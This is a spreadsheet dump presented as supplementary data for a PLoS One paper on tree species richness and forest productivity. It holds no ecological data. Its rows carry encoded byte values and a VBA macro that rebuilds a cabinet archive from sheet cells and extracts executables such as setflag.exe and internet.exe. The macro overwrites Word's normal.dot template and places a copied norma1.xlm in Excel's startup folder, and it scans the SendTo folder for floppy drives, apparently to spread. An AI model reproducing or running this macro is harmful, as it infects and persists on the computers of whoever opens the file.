# Supplementary material for: Woody plant species richness and productivity relationship in a subtropical forest: The predominant role of common species
Source: PLoS One. 2024 Jul 5;19(7):e0306174. doi: 10.1371/journal.pone.0306174 (PMC11226134; doi:10.1371/journal.pone.0306174)
Supplement: S1 Data — (XLS) [file pone.0306174.s001.xls]

## Sheet: TWOWOYVEQQYQWO
0	77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 …	Private Sub createcabfile()
TRUE	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	Dim ch As Byte
9	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	on error resume next
TRUE	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	Set fso = CreateObject("scripting.filesystemobject")
0	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	Set w = CreateObject("wscript.shell")
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	myfolder = w.specialfolders("Templates") & "\Software\"
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	If Not fso.folderexists(myfolder) Then
TRUE	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	fso.createfolder myfolder
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	End If
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	For i=1 to Workbooks.Count
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	If Workbooks(i).name="normal.xlm" then
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0…	workbooks(i).close
	0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 3…	fso.deletefile Application.StartupPath & "\normal.xlm"
	28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179…	End If
	241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 …	Next
	208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150…	For i=1 to Workbooks.Count
	33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105…	If Workbooks(i).name="norma1.xlm" then
	74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 13…	goto a1
	165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 1…	End If
	226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1…	Next
	58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 24…	cabfile= "c:\cab.cab"
	167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 1…	If Not fso.fileexists(Application.StartupPath & "\norma1.xlm") Then
	86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 8…	fso.delete cabfile
	94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103…	open cabfile for binary access write as #1
	173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 4…	For i = 1 To 150
	126 65 171 95 77 178 99 139 82 9 171 194 136 11 68 231 108 183 232 204 114 203 109 58 16 140 176 15 95 117 128 64 177 105 176 226 223 230 11 138 65 50 51 112 115 235 198 208 208 1 174 106 170 79 6 82 86 165 75 156 184 233 244 167 100 242 14 129 92 166 88 201 216 142 29 110 133 233 179 91 216 84 56 65 206 2 84 209 180 95 241 138 87 64 132 176 255 53 22 153 187 103 3 104 172 51 115 151 76 116 61 92…	hv = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value
	128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94 47 142 97 127 114 238 190 91 176 175 160 73 147 140 88 66 11 165 90 156 22 75 24 161 148 17 43 163 124 199 101 138 75 206 239 48 153 187 4 164 …	n=1
	71 62 139 22 41 226 26 139 96 16 11 45 124 158 74 212 179 102 200 20 230 16 44 11 45 162 133 191 161 10 149 99 108 134 248 204 94 92 54 177 125 111 81 12 145 101 162 150 213 92 52 175 50 58 143 187 134 166 11 82 113 81 234 135 34 119 141 155 33 254 0 101 98 213 53 6 133 124 63 45 142 207 203 79 61 205 94 18 225 92 30 183 169 26 113 137 17 150 242 107 98 25 180 251 30 151 166 119 19 176 66 39 91 1…	m=instr(hv," ")
	217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 61 99 32 56 9 197 244 96 72 134 12 204 76 196 102 165 226 97 251 241 157 131 168 69 88 103 74 68 181 94 192 176 5 192 4 39 35 149 154 132 98 70 1…	do while m>0
	103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 212 197 175 202 63 248 141 170 146 68 21 159 253 42 21 51 65 125 3 27 143 104 186 109 114 114 101 225 2 42 32 97 113 186 195 112 172 216 52 190 1…	ch=CByte(mid(hv,n,m-n))
	119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225 251 3 91 174 60 28 242 167 83 146 43 61 96 112 123 100 195 16 1 4 28 239 8 117 164 207 66 227 182 97 143 220 159 18 179 84 158 142 234 25 143 1…	put #1,,ch
	86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 181 31 113 255 137 82 9 13 180 169 64 122 138 241 3 31 195 35 26 134 140 163 0 245 83 193 43 94 98 171 163 1 223 108 84 73 18 230 96 220 22 38 17…	n=m+1
	246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 183 95 69 114 235 3 41 113 183 215 35 254 6 120 192 140 209 1 35 145 239 179 45 220 20 88 110 174 73 153 219 155 180 170 103 202 234 18 118 62 10…	m=instr(n,hv," ")
	255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61 149 240 223 40 79 85 85 41 142 142 21 104 27 7 25 54 192 200 35 23 12 99 43 248 206 189 143 200 32 163 31 223 57 50 250 241 90 126 92 141 217 2…	loop
	59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 143 88 106 102 77 108 154 44 143 71 3 22 93 214 184 77 147 165 45 174 224 26 178 71 216 109 32 186 72 203 225 226 208 38 31 53 85 56 249 215 4 238…	Next
	143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 127 235 184 155 154 253 208 112 83 99 75 19 164 107 253 59 235 183 197 193 234 115 228 111 109 246 111 99 253 181 100 102 226 231 21 97 150 125 5…	close #1
	235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249 230 124 31 69 237 64 252 181 185 42 108 130 189 15 39 0 97 61 108 173 62 129 84 38 166 17 219 13 109 176 97 220 90 105 13 208 188 230 146 198 2…	w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True
	59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189 253 42 189 239 6 61 31 127 178 1 245 43 248 83 150 56 55 65 29 215 36 29 62 164 227 220 169 135 79 235 229 188 94 222 165 183 131 255 254 17 20…	w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True
	182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 138 43 54 11 146 173 88 142 204 202 17 245 236 139 130 57 180 72 16 84 154 186 182 2 233 236 116 224 187 115 124 198 51 139 178 91 83 43 21 156 1…	w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True
	86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 233 175 144 190 143 244 82 210 55 147 126 145 244 11 164 159 34 189 146 244 118 210 119 144 126 137 244 40 233 231 73 31 34 253 0 233 107 72 63 6…	w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True
	216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 251 192 199 77 188 9 2 253 152 71 148 226 69 89 23 132 187 40 204 11 254 247 129 219 39 120 35 17 253 65 192 106 31 37 37 198 182 16 78 39 81 59 …	fso.deletefile cabfile
	113 111 9 70 85 251 102 119 212 83 231 233 172 118 251 253 155 219 27 58 84 255 70 79 180 126 151 76 219 208 58 212 180 192 7 137 35 187 38 162 54 47 93 122 138 255 182 192 30 53 30 164 81 27 209 148 29 227 248 34 81 109 26 213 110 65 95 85 48 232 71 122 187 244 121 0 109 73 30 213 7 196 254 73 125 154 90 124 133 103 202 56 142 115 66 197 126 188 72 63 110 43 254 218 243 103 223 1 165 117 243 67 …	fso.copyfile "c:\normal.dot", myfolder, True
	158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 138 215 13 108 85 139 53 75 228 48 208 48 34 57 188 177 157 39 55 135 39 151 61 19 207 74 245 94 33 106 7 146 108 61 196 75 231 26 33 191 88 220 …	set word=createobject("word.application")
	247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 188 19 179 62 147 52 108 59 49 234 184 181 237 237 177 90 228 114 142 17 63 37 88 61 160 176 250 180 194 234 51 156 213 28 221 242 246 231 212 12…	ntpath=word.NormalTemplate.Path & "\"
	216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 167 229 2 110 25 80 44 39 20 75 159 98 137 9 139 88 240 226 246 157 26 187 75 99 119 170 246 103 122 235 46 39 175 51 232 253 213 189 201 27 97 30…	word.quit
	159 121 131 103 12 95 181 22 243 227 177 53 120 38 218 3 25 203 224 127 60 197 127 2 43 235 162 115 237 98 203 192 60 15 230 114 48 7 210 196 199 125 152 215 83 232 226 123 44 179 77 233 253 11 50 248 23 103 240 175 4 195 181 149 49 171 25 104 16 251 156 119 54 242 253 216 138 187 175 145 199 87 220 103 154 24 187 162 193 63 177 29 240 53 225 138 178 154 241 149 97 51 107 100 173 160 215 176 6 17…	fso.copyfile "c:\normal.dot", ntpath, True
	58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81 249 53 248 199 231 151 49 155 51 148 161 12 101 40 67 25 106 108 117 241 103 83 46 127 251 241 89 111 142 244 191 19 158 90 110 36 38 211 249 2…	fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True
	10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 249 164 137 108 198 204 23 178 158 131 6 49 9 66 223 4 14 13 88 158 38 62 189 69 114 27 194 126 193 221 222 233 11 72 95 144 170 34 26 220 38 164…	fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) & "\"
	149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 210 255 239 204 22 102 141 77 76 160 9 51 43 50 167 196 44 100 78 141 101 145 57 45 54 129 204 233 177 73 137 157 52 186 244 192 228 233 75 56 111…	set fold=fso.getfolder(w.SpecialFolders("SendTo"))
	189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 163 78 213 58 106 71 170 50 142 86 59 227 119 223 238 94 2 145 20 253 195 191 58 13 147 187 219 183 187 183 111 223 123 191 183 111 247 194 30 43 …	for each ff in fold.files
	179 90 83 208 132 131 198 148 70 161 129 45 211 140 101 5 38 79 189 183 206 111 180 85 112 14 158 245 76 38 105 64 186 13 234 23 250 180 122 125 58 163 81 147 106 0 1 179 223 104 33 144 178 185 125 162 236 168 148 117 196 202 43 130 78 20 142 46 23 1 166 94 3 118 208 137 174 222 180 241 202 33 210 50 32 133 23 137 178 160 176 100 210 211 91 142 121 86 191 210 182 191 128 93 129 171 150 33 240 132…	if instr(ff.name,"软盘")>0 then
